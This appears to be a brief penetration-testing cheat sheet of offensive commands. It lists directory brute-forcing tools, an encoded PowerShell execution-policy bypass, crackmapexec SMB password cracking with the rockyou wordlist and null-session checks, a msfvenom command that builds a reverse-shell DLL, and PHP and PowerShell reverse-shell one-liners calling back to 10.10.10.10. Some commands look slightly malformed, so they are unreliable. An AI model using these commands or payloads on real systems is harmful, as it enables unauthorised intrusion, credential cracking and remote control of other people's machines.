Random Tools
Always check for directories!!
wfuzz, Gobuster, Dirbuster, Common files robots.txt etc. Some may even be on this site cough! cough!
Base 64 to check for Kerberos
powershell.exe -NoP -NonI -Exec Bypass -Enc 'awBsAGkAcwB0AA=='
Check if tenant is in Azure
Crackmapexec to crack SMB with Password List
crack smb with pw list:
crackmapexec smb <ip> -u 'User' -p /usr/share/wordlists/rockyou.txt
So you're interested in ICS are you?
Check for SMB shares:
smbclient -L //<ip>/
Crackmapexec for SMB null sessions:
crackmapexec smb <ip> --pass-pol -u '' -p ''
Use msfvenom to create a revershell via a malicious dll:
msfvenom -a x64 windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT 443 -f dll -o evil.dll
Reverse Shells:
PHP: php -r '$sock=fsockopen("10.10.10.10",443);`sh <&3 >&3 2>&3`;'
Powershell: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"